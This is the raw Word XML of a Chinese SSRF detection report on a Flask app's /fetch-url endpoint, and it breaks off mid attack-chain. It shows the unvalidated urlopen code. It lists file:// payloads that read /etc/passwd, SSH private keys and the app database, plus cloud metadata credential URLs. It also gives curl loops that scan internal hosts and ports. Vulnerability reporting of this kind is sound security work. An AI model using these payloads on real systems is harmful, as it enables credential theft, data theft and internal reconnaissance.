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SSRF 服务端请求伪造漏洞检测报告</w:t>
        <w:br/>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>检测日期：2026年07月15日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一、什么是SSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>二、本次检测范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>三、漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>五、攻击1：内网服务探测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>六、攻击2：读取本地文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>七、攻击3：云服务元数据攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>八、攻击4：端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>九、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>十、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>附录：POC代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、什么是SSRF漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>SSRF（Server-Side Request Forgery，服务端请求伪造）是一种Web安全漏洞，攻击者利用服务端发起恶意请求，绕过防火墙访问内部系统或读取敏感文件。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 SSRF攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>服务端提供了一个URL抓取功能，用户提交URL，服务端代为请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>服务端未对URL做任何限制（协议、IP、端口）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>攻击者利用该功能发起内网请求或读取文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>服务端位于内网，可以访问外部无法访问的资源</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 SSRF常见利用方式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利用方式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内网扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>探测内网IP和端口，发现隐藏服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>使用file://协议读取服务器本地文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>云元数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>访问云服务商元数据接口获取临时凭证</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>内网攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>攻击内网Redis/MongoDB/MySQL等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>构造慢请求消耗服务端资源</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、本次检测范围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Flask用户管理系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>漏洞入口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>/fetch-url POST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SSRF + file协议读取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curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>限制情况</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无协议限制、无IP限制、无端口限制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致命 - 可读取文件、探测内网</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>核心漏洞代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import urllib.request  # 新增导入</w:t>
        <w:br/>
        <w:br/>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>@login_required</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ❌ 无协议限制 - 支持 file://</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ❌ 无IP限制 - 支持 127.0.0.1</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # ❌ 无端口限制 - 可扫描端口</w:t>
        <w:br/>
        <w:t xml:space="preserve">    req = urllib.request.Request(url)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    with urllib.request.urlopen(req, timeout=10) as res:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        content = res.read()</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 app.py 新增代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 第6行 - 新增导入</w:t>
        <w:br/>
        <w:t>import urllib.request</w:t>
        <w:br/>
        <w:t>import urllib.error</w:t>
        <w:br/>
        <w:br/>
        <w:t># 第600行左右 - 新增路由</w:t>
        <w:br/>
        <w:t>@app.route("/fetch-url", methods=["POST"])</w:t>
        <w:br/>
        <w:t>@login_required</w:t>
        <w:br/>
        <w:t>def fetch_url():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    url = request.form.get("url", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result_status = ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result_content = ""</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">    if url:</w:t>
        <w:br/>
        <w:t xml:space="preserve">        try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            req = urllib.request.Request(url,</w:t>
        <w:br/>
        <w:t xml:space="preserve">                headers={"User-Agent": "Mozilla/5.0"})</w:t>
        <w:br/>
        <w:t xml:space="preserve">            # ⚠️ 直接将用户输入的URL传入urlopen</w:t>
        <w:br/>
        <w:t xml:space="preserve">            # ⚠️ 无任何协议、IP、端口校验</w:t>
        <w:br/>
        <w:t xml:space="preserve">            with urllib.request.urlopen(req, timeout=10) as response:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result_status = f"{response.status} {response.reason}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">                raw = response.read()</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result_content = raw.decode("utf-8", errors="replace")</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result_content = result_content[:5000]</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 缺失的安全校验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校验项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t>协议白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无（允许file://）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取任意本地文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>内网IP拦截</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无（允许127.0.0.1）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>探测内网服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>端口限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无（允许任意端口）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>端口扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>DNS重绑防护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绕过IP校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>URL超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>10秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>慢攻击DOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、攻击面分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1 攻击面总览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攻击向量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内网HTTP探测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>http://127.0.0.1:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>发现内网Web服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>file:///etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取源码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>file:///app/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取完整源代码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>file:///app/data.db</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>下载整个数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2 可攻击的目标范围</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>本地文件系统：file:// 可读取服务器上的任何文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>内网服务：127.0.0.1、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>云元数据接口：AWS 169.254.169.254、阿里云 100.100.100.200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>内网应用：Redis、MySQL、MongoDB 等无认证服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、攻击1：内网服务探测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5.1 探测本机Web服务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url=http://127.0.0.1:5000/</w:t>
        <w:br/>
        <w:br/>
        <w:t>结果：✅ 返回 200 OK</w:t>
        <w:br/>
        <w:t>响应内容中包含"用户管理系统"字样</w:t>
        <w:br/>
        <w:t>→ 确认内网存在Web服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 探测内网其他服务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>探测SSH端口：</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://127.0.0.1:22</w:t>
        <w:br/>
        <w:br/>
        <w:t>探测MySQL端口：</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://127.0.0.1:3306</w:t>
        <w:br/>
        <w:br/>
        <w:t>探测Redis端口：</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://127.0.0.1:6379</w:t>
        <w:br/>
        <w:br/>
        <w:t>结果：根据超时/拒绝/返回内容判断端口状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 探测内网段</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 遍历内网IP段 192.168.1.1-255</w:t>
        <w:br/>
        <w:t>for i in $(seq 1 255); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  curl -X POST -d "url=http://192.168.1.${i}:80"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http://target/fetch-url -b cookies.txt</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:br/>
        <w:t># 根据返回是否超时判断主机存活</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、攻击2：读取本地文件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6.1 漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>由于未限制URL协议，攻击者可以使用file://协议读取服务器上的任意文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 攻击场景</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>读取系统文件：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url=file:///etc/passwd</w:t>
        <w:br/>
        <w:t>→ 返回系统所有用户列表</w:t>
        <w:br/>
        <w:t>root:x:0:0:root</w:t>
        <w:br/>
        <w:t>www-data:x:33:33</w:t>
        <w:br/>
        <w:t>mysql:x:100:101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>读取应用源代码：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url=file:///workspace/user-management-platform/app.py</w:t>
        <w:br/>
        <w:t>→ 返回完整的Flask应用源码</w:t>
        <w:br/>
        <w:t>→ 发现其他漏洞（CORS配置、密钥等）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>读取数据库文件：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url=file:///workspace/user-management-platform/data/users.db</w:t>
        <w:br/>
        <w:t>→ 返回SQLite数据库二进制内容</w:t>
        <w:br/>
        <w:t>→ 提取后获取所有用户数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>读取配置文件：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url=file:///etc/nginx/nginx.conf</w:t>
        <w:br/>
        <w:t>url=file:///etc/apache2/apache2.conf</w:t>
        <w:br/>
        <w:t>url=file:///etc/redis/redis.conf</w:t>
        <w:br/>
        <w:t>url=file:///root/.ssh/id_rsa</w:t>
        <w:br/>
        <w:t>→ 获取服务器关键配置文件和SSH密钥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>七、攻击3：云服务元数据攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>严重程度：🟠 高危（需云环境）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>如果服务器部署在云平台，可以利用SSRF获取云服务实例的临时凭证：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>AWS：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url=http://169.254.169.254/latest/meta-data/</w:t>
        <w:br/>
        <w:t>url=http://169.254.169.254/latest/meta-data/iam/security-credentials/</w:t>
        <w:br/>
        <w:t>url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role</w:t>
        <w:br/>
        <w:t>→ 获取AWS AccessKey/SecretKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>阿里云：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url=http://100.100.100.200/latest/meta-data/</w:t>
        <w:br/>
        <w:t>url=http://100.100.100.200/latest/meta-data/ram/security-credentials/</w:t>
        <w:br/>
        <w:t>→ 获取阿里云RAM临时凭证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>腾讯云：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://metadata.tencentyun.com/latest/meta-data/</w:t>
        <w:br/>
        <w:t>→ 获取腾讯云临时密钥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>八、攻击4：端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>严重程度：🟡 中危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>利用SSRF可以探测内网主机开放的端口，根据响应超时和错误信息判断端口状态。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探测结果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超时 → 可能开放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返回内容 → 开放</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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拒绝连接/超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>6379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拒绝连接/超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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Tomcat/Proxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>返回内容 → 开放</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>27017</w:t>
            </w:r>
          </w:p>
        </w:tc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拒绝连接/超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t>批量端口扫描脚本：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>for port in 22 80 443 3306 6379 8080 27017; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  result=$(curl -s -o /dev/null -w "%{http_code} %{time_total}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    -X POST -d "url=http://127.0.0.1:${port}/"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    http://target/fetch-url -b cookies.txt)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "Port ${port}: ${result}"</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>九、攻击链演示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>完整SSRF攻击链：从探测到数据窃取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>阶段1：能力验证</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 测试SSRF是否可用</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=http://127.0.0.1:5000/</w:t>
        <w:br/>
        <w:t>→ 返回本机页面 → 确认SSRF漏洞存在 ✅</w:t>
        <w:br/>
        <w:br/>
        <w:t># 测试file协议</w:t>
        <w:br/>
        <w:t>POST /fetch-url</w:t>
        <w:br/>
        <w:t>url=file:///etc/passwd</w:t>
        <w:br/>
        <w:t>→ 返回文件内容 → 确认文件读取可用 ✅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>阶段2：信息收集</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 读取应用源代码</w:t>
        <w:br/>
        <w:t>GET file:///workspace/.../app.py</w:t>
        <w:br/>
        <w:t>→ 发现SECRET_KEY生成方式、数据库密码、API密钥</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取数据库</w:t>
        <w:br/>
        <w:t>GET file:///workspace/.../data/users.db</w:t>
        <w:br/>
        <w:t>→ 获取所有用户的密码哈希</w:t>
        <w:br/>
        <w:br/>
        <w:t># 读取系统配置</w:t>
        <w:br/>
        <w:t>GET file:///etc/nginx/nginx.conf</w:t>
        <w:br/>
        <w:t>→ 获取反向代理配置、内网服务地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>阶段3：内网横向移动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 扫描内网存活主机</w:t>
        <w:br/>
        <w:t>遍历 192.168.1.1-255 → 发现内网Web服务器</w:t>
        <w:br/>
        <w:br/>
        <w:t># 扫描内网端口</w:t>
        <w:br/>
        <w:t>遍历 127.0.0.1:1-65535 → 发现内网服务</w:t>
        <w:br/>
        <w:br/>
        <w:t># 攻击内网服务</w:t>
        <w:br/>
        <w:t>利用SSRF攻击内网的Redis/Memcached等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>阶段4：数据窃取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="567"/>
      </w:pPr>
      <w:r>
        <w:rPr>
